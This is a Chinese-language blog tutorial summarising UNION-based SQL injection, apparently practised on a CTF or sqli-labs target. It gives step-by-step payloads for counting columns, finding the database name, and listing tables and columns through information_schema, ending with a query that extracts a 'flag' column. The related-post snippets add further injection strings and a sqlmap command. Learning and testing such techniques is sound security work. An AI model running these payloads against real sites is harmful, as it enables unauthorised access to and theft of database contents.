自学SQL注入总结一:union注入

最新推荐文章于 2024-09-14 10:10:37 发布
最新推荐文章于 2024-09-14 10:10:37 发布
阅读量519 收藏
点赞数
文章标签: 注入篇
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yesweller/article/details/103219067
版权

@自学SQL注入总结

先理解三层架构中信息流:
1.用户向Web服务器发送请求。
2.Web服务器检索用户数据,创建包含用户输入的SQL语句,然后向数据库服务器发送查询。
3.数据库服务器执行SQL查询并将结果返回给Web服务器。请注意,数据库服务器不知道应用逻辑,它只是执行查询并返回结果。
4.Web服务器根据数据库响应动态的创建HTML页面
引用SQL注入攻击与防御(第二版)

:什么是SQL注入
SQL注入就是将SQL代码插入到输入参数中,之后再将参数传递到SQL服务器加以解释执行。
:如何去发现SQL注入呢?
借助推理进行测试,例如通过发送意外数据(‘ and or )来触发异常
……
:注入类型
1.Union注入(前提必须有错误回显):
1)判断注入类型为数字型还是字符型参考文章
2)判断列数:利用order by查询列数 例如: order by 3 --+
–+为注释注释参考文章
3)判断回显位置:注意让id=-1(报错即可)方便回显想要的数据,图片中null,null,null,也可以为1,2,3

4)查询数据库版本
在这里插入图片描述
版本大于5,会存在information_schema
5)查询数据库名称
union select null,null,database()–+ 查询数据库名
在这里插入图片描述
group_concat:拼接字符串
schema_name:数据库名
information_schema.schemata:information_schema下的schemata表,该表提供了相关数据库的信息

6)查询表名
union select null,group_concat(table_name),null from information_schema.tables where table_schema=‘security’–+
标记部分为数据库名 若不知道可用(select database())代替
table_name:表名
table_schema:表所属的数据库名
7)查询列名
union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘flag’-- +
flag为表名
column_name:列名
8)查询数据
union select null,null,flag from flag --+
查询flag表下flag列下的数据

宇宙超级无敌好的小宝贝
关注
SQL注入学习资料总结
墨痕诉清风的博客
05-13 736
结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。1986年10月,美国国家标准学会对SQL进行规范后,以此作为关系式数据库管理系统的标准语言(ANSI X3. 135-1986),1987年得到国际标准组织的支持下成为国际标准。不过各种通行的。
软件测试:sql注入·依赖基本sql语句
m0_57290404的博客
12-23 1249
目的:回顾数据库查询条件语句(手工sql注入操作基础知识)语句:1. 查询所有字段:select * from users;2. 查询指定字段:3. 条件查询:4. 逻辑与:5. 逻辑或:select * from users where user=‘adminn’ or user_id= 5;联合UNION语句练习 2问题:执行失败,提示:使用SELECT语句有不同的列解决:使用数字代替列,猜测前面表查询寻列数。
sql注入union注入
2301_81242582的博客
09-01 346
如图所示页面对于输入有相对应的回显位及回显信息。
sql注入-union注入union函数 联合注入
07-11 7462
union注入】可与报错注入、盲注、堆叠注入等方法结合使用
SQL 注入漏洞详解 - Union 注入
最新发布
weixin_36813011的博客
09-14 163
1)漏洞简介 SQL 注入简介 SQL 注入 即是指 Web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 Web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 SQL 注入概念 **SQL 注入漏洞 **主要形成的原因是在数据交互中,站点针对前...
sql注入union联合注入_sql注入union
2401_83739411的博客
04-12 1099
1、如果都报错,则为整形闭合。2、如果单引号报错,双引号不报错。然后尝试?id=1 –– 无报错则单引号闭合。报错则单引号加括号。3、如果单引号不报错,双引号报错。然后尝试?id=1"––无报错则双引号闭合。报错则双引号加括号。4、判断真值的方法是指通过构造一个条件语句,利用应用程序返回的结果来判断闭合方式如果是没有报错回显的情况,则可以用判断真值的方法来判断闭合方式。例如:输入index.php?id=1’,页面显示错误再输入index.php?id=1’ --+,页面显示正确。
SQL显错(union注入基础深度剖析(原理)
m0_46304840的博客
03-03 2518
前言 前面基础应该写的差不多了,至于关于编程语言我会后面再写 正文 什么是sql注入sql注入 指 web应用程序没有对用户输入的数据进行判断,导致前端传入后端的参数 可以被攻击者所控制,并且带入数据库执行 $sql = "SELECT * FROM users where id = $GET['id']"; 因为这里的参数,id可以可以控制,所以会被攻击者进行拼接...
SQL注入自学指南
06-24
- **SQLMap简介**:一款开源的SQL注入工具,能够自动化检测和利用SQL注入漏洞。 - **使用方法**: ```bash sqlmap -u "http://example.com/vuln.php?id=1" --dbs ``` #### 六、进阶学习资源 为了进一步提升技能...
SQL注入自学笔记)
woqusss的博客
08-10 393
SQL注入当属漏洞之王,具有高危害性,且利用条件低,利用以及绕过检测方式多种多样。这笔记主要从SQL注入的危害性,以及SQL注入的条件,注入点的判断以及寻找,注入的方式以及类型,不同业务场景下对应的不同query方式利用,成功注入后应该进行的步骤,在具有root高权限账户时候应该进行的操作下,防御以及后端过滤方式和Waf绕过,一些本人见过的查询语句闭合方式。...
渗透自学(四)SQL注入(二)
qq_57449919的博客
01-10 1387
渗透基础自学知识,有写的不好的地方请多多指出
sql注入中的union联合查询,union select 1,2,3
m0_51756263的博客
07-10 9310
sql注入中的union联合查询,union select 1,2,3
sql注入select/union select
@一只躺平的猪@的博客
07-14 3277
selectselect 1 from table、 select count(1) from table、select sum(1) from table union selectunion语句使用条件、判断字段数 union select 1,2(或union select nullnull)、 判断回显位置
SQL注入参考
tainqiuer123的博客
01-22 305
一、union注入(联合查询) 1、如何测试注入 首先找到注入点: 1)后面拼接'+union+select+null-- 2)后面拼接'+union+select+null,null-- 3)后面拼接'+union+select+null,null,null-- 以此类推,确定column的数量,假如数量对上一般返回码200,反之500 4)把null替换成类似'abcdd',测试这个column是否返回的是字符串,假如是字符串即替换成列名称比如username、password的列。例如:
SQL注入union 联合注入
weixin_53711701的博客
01-16 4894
SQL注入union联合注入
SQL注入系列union联合注入
d59hao的博客
04-27 734
union注入攻击,通过unionunion all连接,将自己写的SQL拼接到原始SQL中,从而达到执行任意SQL语句的效果。
sql注入union联合注入
m0_63436163的博客
01-30 993
联合查询注入是联合两个表进行注入攻击,使用关键词 union select 对两个表进行联合查询。两个表的字段数要相同,不然会出现报错。列数相同union 特性是显示两张表 我们就可以吧第一个参数变为------负--的 或者不存在的值 就行了 显示就是以第二张表为主。
为什么sql注入的时候会写union select 1,2~~~~~from admin
热门推荐
被遗弃的庸才博客
04-15 1万+
我也是最近好奇才去学了一点web渗透的知识。在这之前还是需要一定的数据库的相关知识。这里假设知道当前表有多少列(这里设置为10),也可以直接通过order by直接测试出来。union 是联和查询的一个关键字,这个有一个前提就是必须满足所有的列是相同的,所以在这前面必须要添加一些没有意义的列来作为填充。这里给一个网站大家可以去看看,我忘记是在哪里看到了,反正可以用。http://www.joesd...
SQL21自学通:快速掌握SQL编程
* SQL简史:SQL语言的发展历史和演变过程 * 设计数据库的结构:了解数据库的基本结构和组成部分 * SQL总览:了解SQL语言的基本概念和应用场景 * 流行的SQL开发工具:了解常用的SQL开发工具和它们的特点 * SQL在编程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值